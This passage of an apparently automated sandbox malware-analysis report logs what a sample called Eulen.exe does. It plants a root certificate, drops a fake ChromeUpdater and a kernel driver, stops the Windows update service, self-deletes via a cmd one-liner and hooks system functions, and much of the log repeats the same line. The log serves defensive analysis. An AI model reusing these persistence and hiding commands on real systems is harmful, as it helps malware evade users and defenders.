          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E9917599E4 push rbp; retf 19_2_000002E99176326B
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E9917631D0 push rbp; retf 19_2_000002E9917631D3
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991763270 push rbp; retf 19_2_000002E991763273

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeFile created: C:\Program Files\Google\Libs\WR64.sys
          Source: C:\Users\user\Desktop\Eulen.exeFile created: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeJump to dropped file
          Source: C:\Users\user\Desktop\Eulen.exeFile created: C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmpJump to dropped file
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeFile created: C:\Program Files\Google\Libs\WR64.sysJump to dropped file
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeFile created: C:\Windows\Temp\auqpbnqlvfdv.tmpJump to dropped file
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeFile created: C:\Windows\Temp\auqpbnqlvfdv.tmpJump to dropped file
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Users\user\Desktop\Eulen.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\AUQPBNQLVFDV.TMP
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeModule Loaded: C:\WINDOWS\TEMP\AUQPBNQLVFDV.TMP
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeModule Loaded: C:\WINDOWS\TEMP\AUQPBNQLVFDV.TMP
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeModule Loaded: C:\WINDOWS\TEMP\AUQPBNQLVFDV.TMP
          Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
          Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
          Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
          Source: C:\Users\user\Desktop\Eulen.exeMemory written: PID: 7588 base: 7FFBCB910008 value: E9 EB D9 E9 FF Jump to behavior
          Source: C:\Users\user\Desktop\Eulen.exeMemory written: PID: 7588 base: 7FFBCB7AD9F0 value: E9 20 26 16 00 Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeMemory written: PID: 6772 base: 7FFBCB910008 value: E9 EB D9 E9 FF
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeMemory written: PID: 6772 base: 7FFBCB7AD9F0 value: E9 20 26 16 00
          Source: unknownProcess created: C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Eulen.exe"
          Source: C:\Users\user\Desktop\Eulen.exeProcess created: C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Eulen.exe"Jump to behavior
          Source: C:\Windows\System32\lsass.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
